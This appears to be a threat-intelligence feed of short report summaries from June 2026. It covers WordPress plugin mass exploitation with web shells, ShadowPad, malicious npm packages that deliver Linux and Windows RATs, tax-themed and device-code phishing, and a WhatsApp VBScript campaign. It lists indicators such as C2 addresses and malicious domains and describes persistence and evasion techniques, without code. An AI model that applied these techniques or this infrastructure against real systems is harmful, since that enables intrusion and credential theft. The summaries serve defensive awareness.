Exploitation: True Soft: - filemanagerpro file_manager (<6.9) 📚TTPs: ⚔️Tactics: 9 🛠️Technics: 16 🧨IOCs: - File: 17 - Url: 2 - Domain: 1 - IP: 2 - Hash: 9 💽Software: Wordpress, Linux, ThemeREX, BerqWP, WavePlayer, Joomla, WordPress ThemeREX, WordPress WavePlayer, WordPress BerqWP, ThinkPHP, ... 🔢Algorithms: base64, zip, md5, xor 📜Programming Languages: perl, javascript, python, php 💻Platforms: x86, x64, arm #threatreport: A mass web-exploitation operation, attributed to a Chinese actor, compromised thousands of WordPress sites in June 2026, as revealed by data exposed on the Hunt.io platform. This operation involved meticulous target acquisition, with over 850,000 recorded attempts against more than 442,000 vulnerability-site pairs, ultimately identifying 25,195 unique sites that exhibited confirmed or validated evidence of compromise. The attack primarily focused on web applications, notably WordPress plugins, leveraging identified Common Vulnerabilities and Exposures (CVEs) to gain initial access. Key vulnerabilities exploited included arbitrary file uploads and remote code execution capabilities in widely used plugins such as Breeze Cache, ThemeREX Addons, and Gravity Forms, among others, along with various content management systems like Joomla and PrestaShop. Notable CVEs included CVE-2026-48907 (Joomla JCE), CVE-2026-31843 (Pay-UZ), and CVE-2025-7852 (WPBookit), which facilitated the unauthorized exploitation of these platforms. The threat actor implemented sophisticated techniques for initial compromise, utilizing design patterns in their exploits that involved uploading malicious PHP files disguised as legitimate content (e.g., images), executing remote commands through file-handler functions, and deploying custom exploitation tools to automate the process. A variety of post-exploitation techniques were employed, including the installation of web shells and fetching attacker-controlled files. The primary web shell identified, named "down.php," demonstrated advanced capabilities for complete system control, arbitrary command execution, and extensive file management functions. Tooling leveraged by the actor included custom scripts to adjust parameters in various exploit development frameworks and exploitation routines to maximize the efficiency of their scanning processes. This involved modifications to enhance threading parameters and to refine the search patterns for detecting vulnerabilities. The actors also maintained comprehensive logs of their activities, providing insights into their operational tempo and methodologies. Attribution of the campaign rests on linguistic analysis of contained scripts, which exhibited fluent Simplified Chinese, indicating the involvement of a Chinese-speaking actor. The operational methods and toolsets suggest affiliations with groups known to deploy similar tactics. The use of FOFA for reconnaissance and the implementation of the Godzilla webshell for persistent access underscore the sophisticated nature of this attack. In summary, this cyber operation showcases the exploitation of widely-known vulnerabilities across multiple web platforms, with a clear emphasis on WordPress plugins and prominent content management systems, revealing persistent threats to web security and the need for vigilance against similar mass exploitation attempts.

#threatreport #MediumCompleteness The Growing Threat of ShadowPad Malware and Its Business Impact | 24-06-2026 Source: cyberint.com/blog/dark-web/… Key details below ↓ 🧑‍💻Actors/Campaigns: Winnti 💀Threats: Shadowpad, Plugx_rat, Supply_chain_technique, Shadowhammer, Spear-phishing_technique, Lolbin_technique, Watering_hole_technique, Dll_sideloading_technique, Passthehash_technique, Process_injection_technique, 🎯Victims: Government institutions, Critical infrastructure, High value corporate assets, Enterprise software 🏭Industry: Critical_infrastructure, Government 🌐Geo: Chinese 📚TTPs: ⚔️Tactics: 8 🛠️Technics: 20 🧨IOCs: - IP: 34 - Hash: 6 💽Software: NetSarang 🔢Algorithms: sha256 📜Programming Languages: powershell #threatreport: ShadowPad malware, initially attributed to the Chinese state-sponsored group APT41, has become a notable threat in the cybersecurity landscape due to its modular and customizable architecture. First identified in 2015 as an evolution of PlugX, ShadowPad is now utilized by various APT groups, reflecting its versatility in executing malicious operations like data exfiltration, lateral movement, and establishing backdoors into infected systems. Its modularity allows the malware to adapt to specific targets, highlighting its capability for stealth and persistence. The delivery mechanisms for ShadowPad are complex and varied, often employing sophisticated strategies designed to exploit specific vulnerabilities. It can be distributed through software supply chain attacks, wherein attackers compromise updates of legitimate applications, thus exploiting the trust users place in vendors. Additionally, the malware is utilized in conjunction with unpatched vulnerabilities within enterprise software, including zero-day exploits, which provide attackers with a gateway to infiltrate networks. Spear-phishing campaigns further facilitate the spread of ShadowPad, using well-crafted emails containing malicious links or attachments that execute the malware upon interaction. Moreover, operators utilize Living-off-the-Land (LotL) techniques by leveraging existing administrative tools and scripts, such as PowerShell and Windows Management Instrumentation (WMI), which helps avoid detection by security systems. Watering hole attacks also serve as a vehicle for distribution, targeting websites frequented by desired victims to serve the malware inadvertently. The ramifications of deploying ShadowPad can be severe for organizations, leading to significant data breaches characterized by the exfiltration of sensitive information, operational disruptions, espionage activities, and substantial financial losses. The malware’s capabilities lend themselves to stealing intellectual property and customer data, which may be used for espionage or sold on illicit markets. Furthermore, the operational impact can lead to downtime and loss of productivity, as well as the installation of additional payloads that disrupt critical systems. Organizations face the prospect of costly incident response, system recovery efforts, and potential regulatory fines for data breaches that can also incur reputational damage. The public exposure of such incidents may diminish customer trust and market value, resulting in long-term consequences for affected entities.

#threatreport #MediumCompleteness MYRA: A Full Linux RAT Distributed via npm | 23-06-2026 Source: safedep.io/malicious-apin… Key details below ↓ 💀Threats: Myra, Supply_chain_technique, Process_injection_technique, Nop_sled_technique, 🎯Victims: Software development, Linux systems, Npm users 🌐Geo: Polish 📚TTPs: ⚔️Tactics: 2 🛠️Technics: 0 🤖LLM extracted TTPs:` T1014, T1036.005, T1053.003, T1055.008, T1059.004, T1095, T1113, T1195.001, T1548.003, T1564.001, ... 🧨IOCs: - IP: 2 - Email: 1 - File: 12 💽Software: Linux, Node.js, systemd, curl, Ubuntu, sudo 🔢Algorithms: sha256, base64 🔠Functions: readFileSync, createHmac, persistStealthPreload, writeFileSync, persistStealthCron, persistStealthProfile, findDesktopProcessEnv, readProcEnviron 📜Programming Languages: javascript, python #threatreport: A full-featured Linux remote access Trojan (RAT) named MYRA has been distributed via an npm package titled "apintergrationpost." Despite the author's claimed purpose of facilitating authorized red team exercises and EDR validation, MYRA exhibits significant malicious capabilities. Upon installation, it compiles a native C rootkit, establishes three persistence mechanisms, masquerades as a legitimate system service, and manifests fileless execution. The RAT also grants interactive shell access and stream captures from the infected system. The default command and control (C2) configuration points to a private IP address (192.168.54.1), indicating a focused targeting strategy. The installation process is initiated through three npm lifecycle scripts. The 'prepare' script compiles the rootkit by generating C binaries and shared libraries essential for the RAT's evasion tactics and persistence. The 'preinstall' script forces root privileges, ensuring that the attacker has full access to system-level resources and can install necessary system dependencies. Upon successful installation, the 'postinstall' script launches the RAT in a detached background process, rendering it independently operational from npm. The MYRA RAT employs a plugin architecture with 13 modules for its C2 framework, utilizing TCP for communication and requiring HMAC-SHA256 authentication. Notably, the use of a private IP for the C2 server suggests its deployment in a defined network environment rather than using common public domains seen in typical malware distributions. The native rootkit contains sophisticated components such as 'libcache.so' for file hiding via LD_PRELOAD, 'proc_hide' for process masquerading, and 'memfd_exec' and 'memfd_loader' for executing the RAT entirely from memory, thus leaving no traces on disk. Persistence is achieved through three distinct mechanisms: the LD_PRELOAD file-hiding rootkit, a cron job that triggers every 13 minutes to run the RAT, and a login hook via profile.d that executes a wrapper script utilizing the most covert execution method available. These vectors collectively ensure that the RAT remains active even after system reboots or user intervention attempts. As the RAT was developed within a VMware environment, the codebase of MYRA includes telemetry and various MITRE ATT&CK techniques, pointing towards a scenario for red team testing rather than actual deployment into the wild. However, the publication of MYRA into a public npm registry poses grave risks, as it allows unauthorized users access to a potent toolkit that aggregates well-known evasion techniques. The combination of these sophisticated tactics within a single package presents an alarming threat landscape for defenders, reinforcing the need for cautious evaluation of npm packages before installation.

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): schema: 1, code: 6

#threatreport #HighCompleteness An Income Tax Assessment Notice Phishing Campaign Delivering Malware | 23-06-2026 Source: cyfirma.com/research/an-in… Key details below ↓ 💀Threats: Confuserex_tool, Dll_sideloading_technique, Xworm_rat, Spear-phishing_technique, 🎯Victims: Users in india, Organizations in india 🏭Industry: Government 🌐Geo: Indian, Hong kong, China, India 📚TTPs: ⚔️Tactics: 8 🛠️Technics: 22 🧨IOCs: - Domain: 1 - File: 2 - IP: 3 - Hash: 8 🔢Algorithms: zip, sha256, md5 🔠Functions: SetAutoRun, GetWindowsVersion, GetIdleTime 🗂️Win API: DllEntry, GetSecurityInfo YARA: Found #threatreport: A recent malware campaign identified by CYFIRMA leverages a fraudulent Indian Income Tax Department-themed phishing lure to deliver a sophisticated Remote Access Trojan (RAT)-like payload. The attack primarily utilizes a phishing website hosted on the domain harivo.vip, designed to mimic authentic government communication, thus enticing victims to download malicious software masquerading as an official tax assessment notification. The lure incorporates legal language and compliance urgency to enhance its believability, prompting users to download a ZIP archive titled Tax_Assessment_0609.zip. Upon extraction, this archive reveals a malicious disk image file named Tax_Assessment.img, which contains multiple malware components including a Portable Executable (PE) file (Tax_Assessment.exe) that acts as a loader and a DLL (libsvcs.dll). Technical analysis shows that Tax_Assessment.exe employs .NET reflection to dynamically load the DLL, thereby obscuring its malicious intent and complicating static analysis attempts. Both components were obfuscated using ConfuserEx, further complicating detection and making reverse engineering challenging. The payload, libsvcs.dll, exhibits typical RAT functionalities, including methods for establishing persistent backdoor access, gathering system information, and enabling remote command execution via encrypted communications. The binary is configured to connect to a hardcoded Command-and-Control (C2) server located at 103.231.12.27:4444, utilizing an embedded 32-byte encryption key for secure communication. The threat actors behind this campaign are assessed to be financially motivated, utilizing social engineering tactics to deceive targets. The operational design reflects a structured infection methodology with multiple stages of payload delivery, maximizing flexibility while minimizing detection risks. This includes the use of misleading documents as well as techniques that hide execution behaviors and modify system registries. While the C2 infrastructure points to geolocation in Hong Kong, it is critical to note that such information does not definitively indicate the threat actors' origins, as adversaries often use compromised systems and third-party hosting to obscure their tracks. Despite the enticingly regional indicators, comprehensive attribution remains undetermined. Organizations are urged to enhance monitoring capabilities against tax-themed phishing attempts, fortify security measures around executable files, and improve detection mechanisms for suspicious behaviors associated with loader and DLL operations, particularly in response to newly observed communications and potentially malicious infrastructure.

#threatreport #MediumCompleteness From PostCSS Masquerading to Windows RAT | 23-06-2026 Source: research.jfrog.com/post/from-post… Key details below ↓ 🎯Victims: Javascript build ecosystem, Software development, Open source software ecosystem 📚TTPs: ⚔️Tactics: 3 🛠️Technics: 0 🤖LLM extracted TTPs:` T1005, T1047, T1057, T1059, T1059.001, T1059.005, T1059.007, T1071.001, T1082, T1105, ... 🧨IOCs: - File: 18 - Command: 1 - Domain: 1 - Url: 2 - IP: 1 - Hash: 6 💽Software: Chrome, curl, Nuitka, virtualbox, qemu, hyper-v, vmwaretray 🔢Algorithms: md5, aes-256-gcm, rc4, aes, gzip, zip, chacha20-poly1305 🗂️Win API: COMMAND0825INFORMATION, COMMAND0825AUTO, MSG0825LOG, NCryptOpenStorageProvider, NCryptOpenKey, NCryptDecrypt, SeDebugPrivilege 📜Programming Languages: javascript, powershell, python #threatreport: The investigation into a malicious package masquerading as the legitimate postcss-selector-parser highlights a sophisticated attack leveraging the JavaScript package ecosystem. This attack facilitates the deployment of a Windows Remote Access Trojan (RAT) that is capable of various malicious activities, including remote shell capabilities, file transfers, persistence mechanisms, host profiling, and the theft of Chrome credentials. Such obfuscation relies on the popularity of the postcss-selector-parser package, which reports over 150 million weekly downloads to social engineer unsuspecting users. The malware employs a layered architecture with dependencies on seemingly benign packages like aes-decode-runner-pro and postcss-minify-selector-parser. These packages, upon decoding, lead to a PowerShell downloader that initiates the payload chain. The end result is a downloader that fetches additional malicious components from a command-and-control (C2) infrastructure. The PowerShell script downloads a Windows payload from the domain nvidiadriver.net, extracts it to the %TEMP% directory, and executes a VBS bootstrapper, thereby further deploying the malware. Analyzing the payload reveals it operates through HTTP C2 communications, employing encrypted POST packets. It uses RC4/ARC4 for packet transport, integrating MD5 checksums for integrity. Persistence is maintained through the Windows Registry, dynamically collecting victim UUIDs and monitoring host actions, including machine checks to discern whether the malware is running in a virtual machine or a physical environment. The malware is partitioned into multiple modules, such as config.pyd, api.pyd, and audiodriver.pyd, each focusing on distinct functionalities. The command dispatcher is crucial for orchestrating operations, managing the encrypted messaging to the C2 server, and executing the requested commands. Notably, the auto.pyd module is particularly concerning as it is responsible for Chrome credential theft, referencing essential Chrome profile files and utilizing Windows decryption APIs to facilitate access to saved logins. Furthermore, the command.pyd module not only executes commands but also conducts profiling of the host environment to evade detection. It implements checks through Windows Management Instrumentation (WMI), process listings, and other indicators to ascertain if it is sandboxed within a virtualized setup. In summary, this incident illustrates a targeted package-impersonation attack that aims to exploit trust within the npm ecosystem. The real threat materializes after the initial payload is decoded, leading to robust malicious capabilities including extensive data theft and system compromise.

#threatreport #LowCompleteness Extended Rapid Response: Zimperium's On-Device Coverage of the EvilTokens Multi-Brand Phishing Campaign | 23-06-2026 Source: zimperium.com/blog/extended-… Key details below ↓ 💀Threats: Eviltokens_tool, Device_code_phishing_technique, 🎯Victims: Microsoft 365 users, Mobile users 🤖LLM extracted TTPs:` T1528, T1550.001, T1566.002, T1583.006 🔢Algorithms: aes-gcm #threatreport: The EvilTokens campaign represents a notable evolution in phishing tactics, utilizing a Phishing-as-a-Service (PhaaS) model that specifically targets users of Microsoft 365. This attack vector is marked by its sophisticated integration of device-code phishing, which allows it to operate under the guise of trusted brands like DocuSign and Adobe. Through the use of disposable Cloudflare Workers infrastructure, the campaign effectively circumvents standard security measures, making traditional static blocklisting approaches less effective against it. A critical characteristic of the EvilTokens campaign is its ability to bypass both password and multi-factor authentication (MFA). Attackers exploit the legitimate Microsoft page for device approval, enabling victims to unknowingly approve the malicious device. This approach is particularly concerning as it leverages stolen refresh tokens, granting persistent access to attackers that remains viable even after victims reset their passwords. The campaign's impact is magnified by its focus on mobile devices, which are increasingly used to open phishing links. Mobile devices typically have weaker endpoint security controls, making them more susceptible to these types of attacks. In response to these threats, Zimperium’s Mobile Threat Defense (MTD) solution has been effective in detecting and blocking the malicious URLs associated with EvilTokens at the mobile device level. This preemptive measure stops users from reaching the critical phishing step where device codes are entered. Moreover, ongoing research has led to the identification of numerous new domains associated with the EvilTokens phishing kit, indicating a broader compromise landscape. Indicators of compromise (IOCs) related to these domains are publicly accessible for further investigation, enabling organizations to strengthen their defenses against such sophisticated phishing threats.

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): windows: 1, schema: 1

#threatreport #MediumCompleteness WhatsApp VBScript Campaign Installs ManageEngine Endpoint Central for Persistent Remote Access | 23-06-2026 Source: socradar.io/blog/whatsapp-… Key details below ↓ 💀Threats: Bitsadmin_tool, Motw_bypass_technique, Gh0st_rat, Valleyrat, 🎯Victims: Consumers, Organizations 🌐Geo: Malaysia, Spain, French, Mexico, Australia, Vietnam, Brazil, India, Taiwan, Russia, Chinese, German, Singapore, Portuguese 📚TTPs: ⚔️Tactics: 1 🛠️Technics: 0 🤖LLM extracted TTPs:` T1027, T1036, T1036.008, T1059.005, T1105, T1112, T1218.007, T1219, T1548.002, T1553.005, ... 🧨IOCs: - File: 12 - IP: 6 💽Software: WhatsApp, curl 🔢Algorithms: zip 📜Programming Languages: powershell, vbscript #threatreport: The WhatsApp VBScript campaign represents a socially engineered cyber attack wherein attackers distribute a malicious VBScript payload through hijacked WhatsApp accounts. This campaign targets a broad range of victims across multiple countries, with a notable concentration in Malaysia, which accounts for around 80% of reported incidents. The attackers seek to install ManageEngine Endpoint Central, a legitimate enterprise remote management tool, to maintain persistent control over compromised systems by exploiting the common use of WhatsApp for communication in corporate environments. The initial stage of the attack involves using obfuscation techniques to make the VBScript payload appear benign. Attackers employ localized filenames and Windows Update-themed comments to trick users into executing the scripts. The VBScript can obfuscate its operations through methods like string concatenation, encoded content, and mimicking legitimate Windows utilities such as curl or bitsadmin, which are renamed and used to fetch additional malicious payloads. In the second stage, the attack escalates as the script creates a randomized hidden directory within the system, facilitating the download of a ZIP file containing further scripts. By leveraging various methods including PowerShell and curl, the attacker extracts and executes these scripts while attempting to remove metadata that may trigger security warnings. The final stage involves the silent installation of the ManageEngine Endpoint Central agent, allowing adversaries to perform remote administration without triggering typical red flags associated with malicious binaries. Although the campaign exhibits certain characteristics that may suggest the involvement of a Chinese-speaking threat actor, no definitive attribution has been established. The presence of certain IP addresses previously linked to other malware families does not conclusively identify a single operator. This campaign raises new challenges for cybersecurity teams, as it blurs the lines between legitimate software and malicious activity, complicating detection and response efforts. Detection strategies should focus on unusual executions of wscript.exe, suspicious directory creations, and the monitoring of registry writes associated with privilege escalation. It is vital to impose network controls to block known malicious domains and scrutinize unexpected outbound connections to storage services frequently used for hosting payloads.